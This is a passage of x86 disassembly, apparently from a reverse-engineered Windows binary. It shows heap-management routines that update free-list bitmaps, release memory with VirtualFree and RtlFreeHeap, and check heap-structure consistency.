xor eax, eax
jmp loc_4255B7
; ---------------------------------------------------------------------------
loc_425062: ; CODE XREF: sub_424FD0+89�j
mov eax, [ebp+var_10]
sar eax, 4
sub eax, 1
mov [ebp+var_20], eax
cmp [ebp+var_20], 3Fh
jbe short loc_42507B
mov [ebp+var_20], 3Fh
loc_42507B: ; CODE XREF: sub_424FD0+A2�j
mov ecx, [ebp+var_2C]
mov edx, [ebp+var_2C]
mov eax, [ecx+4]
cmp eax, [edx+8]
jnz loc_42515D
cmp [ebp+var_20], 20h
jnb short loc_4250F2
mov edx, 80000000h
mov ecx, [ebp+var_20]
shr edx, cl
not edx
mov eax, [ebp+var_4]
mov ecx, [ebp+var_30]
mov eax, [ecx+eax*4+44h]
and eax, edx
mov ecx, [ebp+var_4]
mov edx, [ebp+var_30]
mov [edx+ecx*4+44h], eax
mov eax, [ebp+var_30]
add eax, [ebp+var_20]
mov cl, [eax+4]
sub cl, 1
mov edx, [ebp+var_30]
add edx, [ebp+var_20]
mov [edx+4], cl
mov eax, [ebp+var_30]
add eax, [ebp+var_20]
movsx ecx, byte ptr [eax+4]
test ecx, ecx
jnz short loc_4250F0
mov edx, 80000000h
mov ecx, [ebp+var_20]
shr edx, cl
not edx
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, edx
mov edx, [ebp+arg_0]
mov [edx], ecx
loc_4250F0: ; CODE XREF: sub_424FD0+106�j
jmp short loc_42515D
; ---------------------------------------------------------------------------
loc_4250F2: ; CODE XREF: sub_424FD0+C1�j
mov ecx, [ebp+var_20]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
not eax
mov ecx, [ebp+var_4]
mov edx, [ebp+var_30]
mov ecx, [edx+ecx*4+0C4h]
and ecx, eax
mov edx, [ebp+var_4]
mov eax, [ebp+var_30]
mov [eax+edx*4+0C4h], ecx
mov ecx, [ebp+var_30]
add ecx, [ebp+var_20]
mov dl, [ecx+4]
sub dl, 1
mov eax, [ebp+var_30]
add eax, [ebp+var_20]
mov [eax+4], dl
mov ecx, [ebp+var_30]
add ecx, [ebp+var_20]
movsx edx, byte ptr [ecx+4]
test edx, edx
jnz short loc_42515D
mov ecx, [ebp+var_20]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
not eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
and edx, eax
mov eax, [ebp+arg_0]
mov [eax+4], edx
loc_42515D: ; CODE XREF: sub_424FD0+B7�j
; sub_424FD0:loc_4250F0�j ...
mov ecx, [ebp+var_2C]
mov edx, [ecx+8]
mov eax, [ebp+var_2C]
mov ecx, [eax+4]
mov [edx+4], ecx
mov edx, [ebp+var_2C]
mov eax, [edx+4]
mov ecx, [ebp+var_2C]
mov edx, [ecx+8]
mov [eax+8], edx
mov eax, [ebp+var_28]
add eax, [ebp+var_10]
sub eax, [ebp+var_1C]
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jle loc_4252D7
mov ecx, [ebp+var_14]
add ecx, [ebp+var_1C]
mov [ebp+var_2C], ecx
mov edx, [ebp+var_10]
sar edx, 4
sub edx, 1
mov [ebp+var_20], edx
cmp [ebp+var_20], 3Fh
jbe short loc_4251B3
mov [ebp+var_20], 3Fh
loc_4251B3: ; CODE XREF: sub_424FD0+1DA�j
mov eax, [ebp+var_20]
mov ecx, [ebp+var_8]
lea edx, [ecx+eax*8]
mov [ebp+var_18], edx
mov eax, [ebp+var_2C]
mov ecx, [ebp+var_18]
mov edx, [ecx+4]
mov [eax+4], edx
mov eax, [ebp+var_2C]
mov ecx, [ebp+var_18]
mov [eax+8], ecx
mov edx, [ebp+var_18]
mov eax, [ebp+var_2C]
mov [edx+4], eax
mov ecx, [ebp+var_2C]
mov edx, [ecx+4]
mov eax, [ebp+var_2C]
mov [edx+8], eax
mov ecx, [ebp+var_2C]
mov edx, [ebp+var_2C]
mov eax, [ecx+4]
cmp eax, [edx+8]
jnz loc_4252C3
cmp [ebp+var_20], 20h
jnb short loc_42525C
mov ecx, [ebp+var_30]
add ecx, [ebp+var_20]
movsx edx, byte ptr [ecx+4]
mov eax, [ebp+var_30]
add eax, [ebp+var_20]
mov cl, [eax+4]
add cl, 1
mov eax, [ebp+var_30]
add eax, [ebp+var_20]
mov [eax+4], cl
test edx, edx
jnz short loc_42523A
mov edx, 80000000h
mov ecx, [ebp+var_20]
shr edx, cl
mov eax, [ebp+arg_0]
mov ecx, [eax]
or ecx, edx
mov edx, [ebp+arg_0]
mov [edx], ecx
loc_42523A: ; CODE XREF: sub_424FD0+252�j
mov eax, 80000000h
mov ecx, [ebp+var_20]
loc_425242: ; DATA XREF: _2:off_44F830�o
shr eax, cl
loc_425244: ; DATA XREF: _2:004546F4�o
mov ecx, [ebp+var_4]
mov edx, [ebp+var_30]
mov ecx, [edx+ecx*4+44h]
or ecx, eax
mov edx, [ebp+var_4]
mov eax, [ebp+var_30]
mov [eax+edx*4+44h], ecx
jmp short loc_4252C3
; ---------------------------------------------------------------------------
loc_42525C: ; CODE XREF: sub_424FD0+22F�j
mov ecx, [ebp+var_30]
add ecx, [ebp+var_20]
movsx edx, byte ptr [ecx+4]
mov eax, [ebp+var_30]
add eax, [ebp+var_20]
mov cl, [eax+4]
add cl, 1
mov eax, [ebp+var_30]
add eax, [ebp+var_20]
mov [eax+4], cl
test edx, edx
jnz short loc_42529A
mov ecx, [ebp+var_20]
sub ecx, 20h
mov edx, 80000000h
shr edx, cl
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
or ecx, edx
mov edx, [ebp+arg_0]
mov [edx+4], ecx
loc_42529A: ; CODE XREF: sub_424FD0+2AD�j
mov ecx, [ebp+var_20]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
mov ecx, [ebp+var_4]
mov edx, [ebp+var_30]
mov ecx, [edx+ecx*4+0C4h]
or ecx, eax
mov edx, [ebp+var_4]
mov eax, [ebp+var_30]
mov [eax+edx*4+0C4h], ecx
loc_4252C3: ; CODE XREF: sub_424FD0+225�j
; sub_424FD0+28A�j
mov ecx, [ebp+var_2C]
mov edx, [ebp+var_10]
mov [ecx], edx
mov eax, [ebp+var_2C]
add eax, [ebp+var_10]
mov ecx, [ebp+var_10]
mov [eax-4], ecx
loc_4252D7: ; CODE XREF: sub_424FD0+1BB�j
mov edx, [ebp+var_1C]
add edx, 1
mov eax, [ebp+var_14]
mov [eax], edx
mov ecx, [ebp+var_1C]
add ecx, 1
mov edx, [ebp+var_14]
add edx, [ebp+var_1C]
mov [edx-4], ecx
jmp loc_4255B2
; ---------------------------------------------------------------------------
loc_4252F6: ; CODE XREF: sub_424FD0+70�j
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_28]
jge loc_4255B2
mov ecx, [ebp+var_1C]
add ecx, 1
mov edx, [ebp+var_14]
mov [edx], ecx
mov eax, [ebp+var_1C]
add eax, 1
mov ecx, [ebp+var_14]
add ecx, [ebp+var_1C]
mov [ecx-4], eax
mov edx, [ebp+var_14]
add edx, [ebp+var_1C]
mov [ebp+var_14], edx
mov eax, [ebp+var_28]
sub eax, [ebp+var_1C]
mov [ebp+var_28], eax
mov ecx, [ebp+var_28]
sar ecx, 4
sub ecx, 1
mov [ebp+var_24], ecx
cmp [ebp+var_24], 3Fh
jbe short loc_425347
mov [ebp+var_24], 3Fh
loc_425347: ; CODE XREF: sub_424FD0+36E�j
mov edx, [ebp+var_10]
and edx, 1
test edx, edx
jnz loc_425490
mov eax, [ebp+var_10]
sar eax, 4
sub eax, 1
mov [ebp+var_20], eax
cmp [ebp+var_20], 3Fh
jbe short loc_42536E
mov [ebp+var_20], 3Fh
loc_42536E: ; CODE XREF: sub_424FD0+395�j
mov ecx, [ebp+var_2C]
mov edx, [ebp+var_2C]
mov eax, [ecx+4]
cmp eax, [edx+8]
jnz loc_425450
cmp [ebp+var_20], 20h
jnb short loc_4253E5
mov edx, 80000000h
mov ecx, [ebp+var_20]
shr edx, cl
not edx
mov eax, [ebp+var_4]
mov ecx, [ebp+var_30]
mov eax, [ecx+eax*4+44h]
and eax, edx
mov ecx, [ebp+var_4]
mov edx, [ebp+var_30]
mov [edx+ecx*4+44h], eax
mov eax, [ebp+var_30]
add eax, [ebp+var_20]
mov cl, [eax+4]
sub cl, 1
mov edx, [ebp+var_30]
add edx, [ebp+var_20]
mov [edx+4], cl
mov eax, [ebp+var_30]
add eax, [ebp+var_20]
movsx ecx, byte ptr [eax+4]
test ecx, ecx
jnz short loc_4253E3
mov edx, 80000000h
mov ecx, [ebp+var_20]
shr edx, cl
not edx
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, edx
mov edx, [ebp+arg_0]
mov [edx], ecx
loc_4253E3: ; CODE XREF: sub_424FD0+3F9�j
jmp short loc_425450
; ---------------------------------------------------------------------------
loc_4253E5: ; CODE XREF: sub_424FD0+3B4�j
mov ecx, [ebp+var_20]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
not eax
mov ecx, [ebp+var_4]
mov edx, [ebp+var_30]
mov ecx, [edx+ecx*4+0C4h]
and ecx, eax
mov edx, [ebp+var_4]
mov eax, [ebp+var_30]
mov [eax+edx*4+0C4h], ecx
mov ecx, [ebp+var_30]
add ecx, [ebp+var_20]
mov dl, [ecx+4]
sub dl, 1
mov eax, [ebp+var_30]
add eax, [ebp+var_20]
mov [eax+4], dl
mov ecx, [ebp+var_30]
add ecx, [ebp+var_20]
movsx edx, byte ptr [ecx+4]
test edx, edx
jnz short loc_425450
mov ecx, [ebp+var_20]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
not eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
and edx, eax
mov eax, [ebp+arg_0]
mov [eax+4], edx
loc_425450: ; CODE XREF: sub_424FD0+3AA�j
; sub_424FD0:loc_4253E3�j ...
mov ecx, [ebp+var_2C]
mov edx, [ecx+8]
mov eax, [ebp+var_2C]
mov ecx, [eax+4]
mov [edx+4], ecx
mov edx, [ebp+var_2C]
mov eax, [edx+4]
mov ecx, [ebp+var_2C]
mov edx, [ecx+8]
mov [eax+8], edx
mov eax, [ebp+var_28]
add eax, [ebp+var_10]
mov [ebp+var_28], eax
mov ecx, [ebp+var_28]
sar ecx, 4
sub ecx, 1
mov [ebp+var_24], ecx
cmp [ebp+var_24], 3Fh
jbe short loc_425490
mov [ebp+var_24], 3Fh
loc_425490: ; CODE XREF: sub_424FD0+37F�j
; sub_424FD0+4B7�j
mov edx, [ebp+var_24]
mov eax, [ebp+var_8]
lea ecx, [eax+edx*8]
mov [ebp+var_18], ecx
mov edx, [ebp+var_14]
mov eax, [ebp+var_18]
mov ecx, [eax+4]
mov [edx+4], ecx
mov edx, [ebp+var_14]
mov eax, [ebp+var_18]
mov [edx+8], eax
mov ecx, [ebp+var_18]
mov edx, [ebp+var_14]
mov [ecx+4], edx
mov eax, [ebp+var_14]
mov ecx, [eax+4]
mov edx, [ebp+var_14]
mov [ecx+8], edx
mov eax, [ebp+var_14]
mov ecx, [ebp+var_14]
mov edx, [eax+4]
cmp edx, [ecx+8]
jnz loc_42559E
cmp [ebp+var_24], 20h
jnb short loc_425538
mov eax, [ebp+var_30]
add eax, [ebp+var_24]
movsx ecx, byte ptr [eax+4]
mov edx, [ebp+var_30]
add edx, [ebp+var_24]
mov al, [edx+4]
add al, 1
mov edx, [ebp+var_30]
add edx, [ebp+var_24]
mov [edx+4], al
test ecx, ecx
jnz short loc_425516
mov eax, 80000000h
mov ecx, [ebp+var_24]
shr eax, cl
mov ecx, [ebp+arg_0]
mov edx, [ecx]
or edx, eax
mov eax, [ebp+arg_0]
mov [eax], edx
loc_425516: ; CODE XREF: sub_424FD0+52E�j
mov edx, 80000000h
mov ecx, [ebp+var_24]
shr edx, cl
mov eax, [ebp+var_4]
mov ecx, [ebp+var_30]
mov eax, [ecx+eax*4+44h]
or eax, edx
mov ecx, [ebp+var_4]
mov edx, [ebp+var_30]
mov [edx+ecx*4+44h], eax
jmp short loc_42559E
; ---------------------------------------------------------------------------
loc_425538: ; CODE XREF: sub_424FD0+50C�j
mov eax, [ebp+var_30]
add eax, [ebp+var_24]
movsx ecx, byte ptr [eax+4]
mov edx, [ebp+var_30]
add edx, [ebp+var_24]
mov al, [edx+4]
add al, 1
mov edx, [ebp+var_30]
add edx, [ebp+var_24]
mov [edx+4], al
test ecx, ecx
jnz short loc_425575
mov ecx, [ebp+var_24]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
or edx, eax
mov eax, [ebp+arg_0]
mov [eax+4], edx
loc_425575: ; CODE XREF: sub_424FD0+588�j
mov ecx, [ebp+var_24]
sub ecx, 20h
mov edx, 80000000h
shr edx, cl
mov eax, [ebp+var_4]
mov ecx, [ebp+var_30]
mov eax, [ecx+eax*4+0C4h]
or eax, edx
mov ecx, [ebp+var_4]
mov edx, [ebp+var_30]
mov [edx+ecx*4+0C4h], eax
loc_42559E: ; CODE XREF: sub_424FD0+502�j
; sub_424FD0+566�j
mov eax, [ebp+var_14]
mov ecx, [ebp+var_28]
mov [eax], ecx
mov edx, [ebp+var_14]
add edx, [ebp+var_28]
mov eax, [ebp+var_28]
mov [edx-4], eax
loc_4255B2: ; CODE XREF: sub_424FD0+321�j
; sub_424FD0+32C�j
mov eax, 1
loc_4255B7: ; CODE XREF: sub_424FD0+8D�j
mov esp, ebp
pop ebp
retn
sub_424FD0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp ds:dword_4F3A00, 0
jz loc_4256EC
mov eax, ds:dword_4F39F4
shl eax, 0Fh
mov ecx, ds:dword_4F3A00
mov edx, [ecx+0Ch]
add edx, eax
mov [ebp-4], edx
push 4000h
push 8000h
mov eax, [ebp-4]
push eax
call ds:dword_4F54B0 ; VirtualFree
mov edx, 80000000h
mov ecx, ds:dword_4F39F4
shr edx, cl
mov eax, ds:dword_4F3A00
mov ecx, [eax+8]
or ecx, edx
mov edx, ds:dword_4F3A00
mov [edx+8], ecx
mov eax, ds:dword_4F3A00
mov ecx, [eax+10h]
mov edx, ds:dword_4F39F4
mov dword ptr [ecx+edx*4+0C4h], 0
mov eax, ds:dword_4F3A00
mov ecx, [eax+10h]
mov dl, [ecx+43h]
sub dl, 1
mov eax, ds:dword_4F3A00
mov ecx, [eax+10h]
mov [ecx+43h], dl
mov edx, ds:dword_4F3A00
mov eax, [edx+10h]
movsx ecx, byte ptr [eax+43h]
test ecx, ecx
jnz short loc_425672
mov edx, ds:dword_4F3A00
mov eax, [edx+4]
and al, 0FEh
mov ecx, ds:dword_4F3A00
mov [ecx+4], eax
loc_425672: ; CODE XREF: _0:0042565C�j
mov edx, ds:dword_4F3A00
cmp dword ptr [edx+8], 0FFFFFFFFh
jnz short loc_4256E2
cmp ds:dword_4F3A04, 1
jle short loc_4256E2
mov eax, ds:dword_4F3A00
mov ecx, [eax+10h]
push ecx
push 0
mov edx, ds:dword_4F39E8
push edx
call ds:dword_4F5414 ; RtlFreeHeap
mov eax, ds:dword_4F3A04
imul eax, 14h
mov ecx, ds:dword_4F3A08
add ecx, eax
mov edx, ds:dword_4F3A00
add edx, 14h
sub ecx, edx
push ecx
mov eax, ds:dword_4F3A00
add eax, 14h
push eax
mov ecx, ds:dword_4F3A00
push ecx
call sub_420840
add esp, 0Ch
mov edx, ds:dword_4F3A04
sub edx, 1
mov ds:dword_4F3A04, edx
loc_4256E2: ; CODE XREF: _0:0042567C�j _0:00425685�j
mov ds:dword_4F3A00, 0
loc_4256EC: ; CODE XREF: _0:004255CB�j
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4256F0 proc near ; CODE XREF: sub_423E20+44�p
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_160 = dword ptr -160h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_154 = dword ptr -154h
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 168h
mov eax, ds:dword_4F3A04
imul eax, 14h
push eax
mov ecx, ds:dword_4F3A08
push ecx
call ds:dword_4F546C ; IsBadWritePtr
test eax, eax
jz short loc_42571B
or eax, 0FFFFFFFFh
jmp loc_425D09
; ---------------------------------------------------------------------------
loc_42571B: ; CODE XREF: sub_4256F0+21�j
mov edx, ds:dword_4F3A08
mov [ebp+var_13C], edx
mov [ebp+var_120], 0
jmp short loc_425742
; ---------------------------------------------------------------------------
loc_425733: ; CODE XREF: sub_4256F0+612�j
mov eax, [ebp+var_120]
add eax, 1
mov [ebp+var_120], eax
loc_425742: ; CODE XREF: sub_4256F0+41�j
mov ecx, [ebp+var_120]
cmp ecx, ds:dword_4F3A04
jge loc_425D07
mov edx, [ebp+var_13C]
mov eax, [edx+10h]
mov [ebp+var_160], eax
push 41C4h
mov ecx, [ebp+var_160]
push ecx
call ds:dword_4F546C ; IsBadWritePtr
test eax, eax
jz short loc_425783
mov eax, 0FFFFFFFEh
jmp loc_425D09
; ---------------------------------------------------------------------------
loc_425783: ; CODE XREF: sub_4256F0+87�j
mov edx, [ebp+var_13C]
mov eax, [edx+0Ch]
mov [ebp+var_128], eax
mov ecx, [ebp+var_160]
add ecx, 144h
mov [ebp+var_18], ecx
mov edx, [ebp+var_13C]
mov eax, [edx+8]
mov [ebp+var_4], eax
mov [ebp+var_144], 0
mov [ebp+var_158], 0
mov [ebp+var_C], 0
jmp short loc_4257D3
; ---------------------------------------------------------------------------
loc_4257CA: ; CODE XREF: sub_4256F0+5D6�j
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
loc_4257D3: ; CODE XREF: sub_4256F0+D8�j
cmp [ebp+var_C], 20h
jge loc_425CCB
mov [ebp+var_11C], 0
mov [ebp+var_150], 0
mov [ebp+var_12C], 0
mov [ebp+var_14C], 0
jmp short loc_425816
; ---------------------------------------------------------------------------
loc_425807: ; CODE XREF: sub_4256F0+140�j
mov edx, [ebp+var_14C]
add edx, 1
mov [ebp+var_14C], edx
loc_425816: ; CODE XREF: sub_4256F0+115�j
cmp [ebp+var_14C], 40h
jge short loc_425832
mov eax, [ebp+var_14C]
mov [ebp+eax*4+var_118], 0
jmp short loc_425807
; ---------------------------------------------------------------------------
loc_425832: ; CODE XREF: sub_4256F0+12D�j
cmp [ebp+var_4], 0
jl loc_425C6D
push 8000h
mov ecx, [ebp+var_128]
push ecx
call ds:dword_4F546C ; IsBadWritePtr
test eax, eax
jz short loc_42585C
mov eax, 0FFFFFFFCh
jmp loc_425D09
; ---------------------------------------------------------------------------
loc_42585C: ; CODE XREF: sub_4256F0+160�j
mov edx, [ebp+var_128]
mov [ebp+var_8], edx
mov [ebp+var_140], 0
jmp short loc_425880
; ---------------------------------------------------------------------------
loc_425871: ; CODE XREF: sub_4256F0+30F�j
mov eax, [ebp+var_140]
add eax, 1
mov [ebp+var_140], eax
loc_425880: ; CODE XREF: sub_4256F0+17F�j
cmp [ebp+var_140], 8
jge loc_425A04
mov ecx, [ebp+var_8]
add ecx, 0Ch
mov [ebp+var_130], ecx
mov edx, [ebp+var_130]
add edx, 0FF0h
mov [ebp+var_138], edx
mov eax, [ebp+var_130]
cmp dword ptr [eax-4], 0FFFFFFFFh
jnz short loc_4258C2
mov ecx, [ebp+var_138]
cmp dword ptr [ecx], 0FFFFFFFFh
jz short loc_4258CC
loc_4258C2: ; CODE XREF: sub_4256F0+1C5�j
mov eax, 0FFFFFFFBh
jmp loc_425D09
; ---------------------------------------------------------------------------
loc_4258CC: ; CODE XREF: sub_4256F0+1D0�j
; sub_4256F0+2E6�j
mov edx, [ebp+var_130]
mov eax, [edx]
mov [ebp+var_148], eax
mov ecx, [ebp+var_148]
mov [ebp+var_154], ecx
mov edx, [ebp+var_154]
and edx, 1
test edx, edx
jz short loc_425929
mov eax, [ebp+var_148]
sub eax, 1
mov [ebp+var_148], eax
cmp [ebp+var_148], 400h
jle short loc_425918
mov eax, 0FFFFFFFAh
jmp loc_425D09
; ---------------------------------------------------------------------------
loc_425918: ; CODE XREF: sub_4256F0+21C�j
mov ecx, [ebp+var_12C]
add ecx, 1
mov [ebp+var_12C], ecx
jmp short loc_42596B
; ---------------------------------------------------------------------------
loc_425929: ; CODE XREF: sub_4256F0+201�j
mov edx, [ebp+var_148]
sar edx, 4
sub edx, 1
mov [ebp+var_14C], edx
cmp [ebp+var_14C], 3Fh
jle short loc_42594E
mov [ebp+var_14C], 3Fh
loc_42594E: ; CODE XREF: sub_4256F0+252�j
mov eax, [ebp+var_14C]
mov ecx, [ebp+eax*4+var_118]
add ecx, 1
mov edx, [ebp+var_14C]
mov [ebp+edx*4+var_118], ecx
loc_42596B: ; CODE XREF: sub_4256F0+237�j
cmp [ebp+var_148], 10h
jl short loc_42598D
mov eax, [ebp+var_148]
and eax, 0Fh
test eax, eax
jnz short loc_42598D
cmp [ebp+var_148], 0FF0h
jle short loc_425997
loc_42598D: ; CODE XREF: sub_4256F0+282�j
; sub_4256F0+28F�j
mov eax, 0FFFFFFF9h
jmp loc_425D09
; ---------------------------------------------------------------------------
loc_425997: ; CODE XREF: sub_4256F0+29B�j
mov ecx, [ebp+var_130]
add ecx, [ebp+var_148]
mov edx, [ecx-4]
cmp edx, [ebp+var_154]
jz short loc_4259B8
mov eax, 0FFFFFFF8h
jmp loc_425D09
; ---------------------------------------------------------------------------
loc_4259B8: ; CODE XREF: sub_4256F0+2BC�j
mov eax, [ebp+var_130]
add eax, [ebp+var_148]
mov [ebp+var_130], eax
mov ecx, [ebp+var_130]
cmp ecx, [ebp+var_138]
jb loc_4258CC
mov edx, [ebp+var_130]
cmp edx, [ebp+var_138]
jz short loc_4259F4
mov eax, 0FFFFFFF8h
jmp loc_425D09
; ---------------------------------------------------------------------------
loc_4259F4: ; CODE XREF: sub_4256F0+2F8�j
mov eax, [ebp+var_8]
add eax, 1000h
mov [ebp+var_8], eax
jmp loc_425871
; ---------------------------------------------------------------------------
loc_425A04: ; CODE XREF: sub_4256F0+197�j
mov ecx, [ebp+var_18]
mov edx, [ecx]
cmp edx, [ebp+var_12C]
jz short loc_425A1B
mov eax, 0FFFFFFF7h
jmp loc_425D09
; ---------------------------------------------------------------------------
loc_425A1B: ; CODE XREF: sub_4256F0+31F�j
mov eax, [ebp+var_18]
mov [ebp+var_134], eax
mov [ebp+var_14], 0
jmp short loc_425A36
; ---------------------------------------------------------------------------
loc_425A2D: ; CODE XREF: sub_4256F0+578�j
mov ecx, [ebp+var_14]
add ecx, 1
mov [ebp+var_14], ecx
loc_425A36: ; CODE XREF: sub_4256F0+33B�j
cmp [ebp+var_14], 40h
jge loc_425C6D
mov [ebp+var_168], 0
mov edx, [ebp+var_134]
mov [ebp+var_130], edx
loc_425A56: ; CODE XREF: sub_4256F0+4A5�j
mov eax, [ebp+var_130]
mov ecx, [eax+4]
mov [ebp+var_15C], ecx
mov edx, [ebp+var_15C]
cmp edx, [ebp+var_134]
jz loc_425B9A
mov eax, [ebp+var_14]
mov ecx, [ebp+var_168]
cmp ecx, [ebp+eax*4+var_118]
jz loc_425B9A
mov edx, [ebp+var_15C]
cmp edx, [ebp+var_128]
jb short loc_425AAE
mov eax, [ebp+var_128]
add eax, 8000h
cmp [ebp+var_15C], eax
jb short loc_425AB8
loc_425AAE: ; CODE XREF: sub_4256F0+3A9�j
mov eax, 0FFFFFFF6h
jmp loc_425D09
; ---------------------------------------------------------------------------
loc_425AB8: ; CODE XREF: sub_4256F0+3BC�j
mov ecx, [ebp+var_15C]
and ecx, 0FFFFF000h
mov [ebp+var_164], ecx
mov edx, [ebp+var_164]
add edx, 0Ch
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
add eax, 0FF0h
mov [ebp+var_124], eax
loc_425AE4: ; CODE XREF: sub_4256F0+41C�j
mov ecx, [ebp+var_10]
cmp ecx, [ebp+var_124]
jz short loc_425B0E
mov edx, [ebp+var_10]
cmp edx, [ebp+var_15C]
jnz short loc_425AFC
jmp short loc_425B0E
; ---------------------------------------------------------------------------
loc_425AFC: ; CODE XREF: sub_4256F0+408�j
mov eax, [ebp+var_10]
mov ecx, [eax]
and ecx, 0FFFFFFFEh
mov edx, [ebp+var_10]
add edx, ecx
mov [ebp+var_10], edx
jmp short loc_425AE4
; ---------------------------------------------------------------------------
loc_425B0E: ; CODE XREF: sub_4256F0+3FD�j
; sub_4256F0+40A�j
mov eax, [ebp+var_10]
cmp eax, [ebp+var_124]
jnz short loc_425B23
mov eax, 0FFFFFFF5h
jmp loc_425D09
; ---------------------------------------------------------------------------
loc_425B23: ; CODE XREF: sub_4256F0+427�j
mov ecx, [ebp+var_15C]
mov edx, [ecx]
sar edx, 4
sub edx, 1
mov [ebp+var_14C], edx
cmp [ebp+var_14C], 3Fh
jle short loc_425B4A
mov [ebp+var_14C], 3Fh
loc_425B4A: ; CODE XREF: sub_4256F0+44E�j
mov eax, [ebp+var_14C]
cmp eax, [ebp+var_14]
jz short loc_425B5F
mov eax, 0FFFFFFF4h
jmp loc_425D09
; ---------------------------------------------------------------------------
loc_425B5F: ; CODE XREF: sub_4256F0+463�j
mov ecx, [ebp+var_15C]
mov edx, [ecx+8]
cmp edx, [ebp+var_130]
jz short loc_425B7A
mov eax, 0FFFFFFF3h
jmp loc_425D09
; ---------------------------------------------------------------------------
loc_425B7A: ; CODE XREF: sub_4256F0+47E�j
mov eax, [ebp+var_15C]
mov [ebp+var_130], eax
mov ecx, [ebp+var_168]
add ecx, 1
mov [ebp+var_168], ecx
jmp loc_425A56
; ---------------------------------------------------------------------------
loc_425B9A: ; CODE XREF: sub_4256F0+381�j
; sub_4256F0+397�j
cmp [ebp+var_168], 0
jz short loc_425C11
cmp [ebp+var_14], 20h
jge short loc_425BDB
mov edx, 80000000h
mov ecx, [ebp+var_14]
shr edx, cl
mov eax, [ebp+var_11C]
or eax, edx
mov [ebp+var_11C], eax
mov edx, 80000000h
mov ecx, [ebp+var_14]
shr edx, cl
mov eax, [ebp+var_144]
or eax, edx
mov [ebp+var_144], eax
jmp short loc_425C11
; ---------------------------------------------------------------------------
loc_425BDB: ; CODE XREF: sub_4256F0+4B7�j
mov ecx, [ebp+var_14]
sub ecx, 20h
mov edx, 80000000h
shr edx, cl
mov eax, [ebp+var_150]
or eax, edx
mov [ebp+var_150], eax
mov ecx, [ebp+var_14]
sub ecx, 20h
mov edx, 80000000h
shr edx, cl
mov eax, [ebp+var_158]
or eax, edx
mov [ebp+var_158], eax
loc_425C11: ; CODE XREF: sub_4256F0+4B1�j
; sub_4256F0+4E9�j
mov ecx, [ebp+var_130]
mov edx, [ecx+4]
cmp edx, [ebp+var_134]
jnz short loc_425C34
mov eax, [ebp+var_14]
mov ecx, [ebp+var_168]
cmp ecx, [ebp+eax*4+var_118]
jz short loc_425C3E
loc_425C34: ; CODE XREF: sub_4256F0+530�j
mov eax, 0FFFFFFF2h
jmp loc_425D09
; ---------------------------------------------------------------------------
loc_425C3E: ; CODE XREF: sub_4256F0+542�j
mov edx, [ebp+var_134]
mov eax, [edx+8]
cmp eax, [ebp+var_130]
jz short loc_425C59
mov eax, 0FFFFFFF1h
jmp loc_425D09
; ---------------------------------------------------------------------------
loc_425C59: ; CODE XREF: sub_4256F0+55D�j
mov ecx, [ebp+var_134]
add ecx, 8
mov [ebp+var_134], ecx
jmp loc_425A2D
; ---------------------------------------------------------------------------
loc_425C6D: ; CODE XREF: sub_4256F0+146�j
; sub_4256F0+34A�j
mov edx, [ebp+var_C]
mov eax, [ebp+var_160]
mov ecx, [ebp+var_11C]
cmp ecx, [eax+edx*4+44h]
jnz short loc_425C9A
mov edx, [ebp+var_C]
mov eax, [ebp+var_160]
mov ecx, [ebp+var_150]
cmp ecx, [eax+edx*4+0C4h]
jz short loc_425CA1
loc_425C9A: ; CODE XREF: sub_4256F0+590�j
mov eax, 0FFFFFFF0h
jmp short loc_425D09
; ---------------------------------------------------------------------------
loc_425CA1: ; CODE XREF: sub_4256F0+5A8�j
mov edx, [ebp+var_128]
add edx, 8000h
mov [ebp+var_128], edx
mov eax, [ebp+var_18]
add eax, 204h
mov [ebp+var_18], eax
mov ecx, [ebp+var_4]
shl ecx, 1
mov [ebp+var_4], ecx
jmp loc_4257CA
; ---------------------------------------------------------------------------
loc_425CCB: ; CODE XREF: sub_4256F0+E7�j
mov edx, [ebp+var_13C]
mov eax, [ebp+var_144]
cmp eax, [edx]
jnz short loc_425CEC
mov ecx, [ebp+var_13C]
mov edx, [ebp+var_158]
cmp edx, [ecx+4]
jz short loc_425CF3
loc_425CEC: ; CODE XREF: sub_4256F0+5E9�j
mov eax, 0FFFFFFEFh
jmp short loc_425D09
; ---------------------------------------------------------------------------
loc_425CF3: ; CODE XREF: sub_4256F0+5FA�j
mov eax, [ebp+var_13C]
add eax, 14h
mov [ebp+var_13C], eax
jmp loc_425733
; ---------------------------------------------------------------------------
loc_425D07: ; CODE XREF: sub_4256F0+5E�j
xor eax, eax
loc_425D09: ; CODE XREF: sub_4256F0+26�j
; sub_4256F0+8E�j ...
mov esp, ebp
pop ebp
retn
sub_4256F0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
mov eax, ds:dword_453BDC
pop ebp
retn
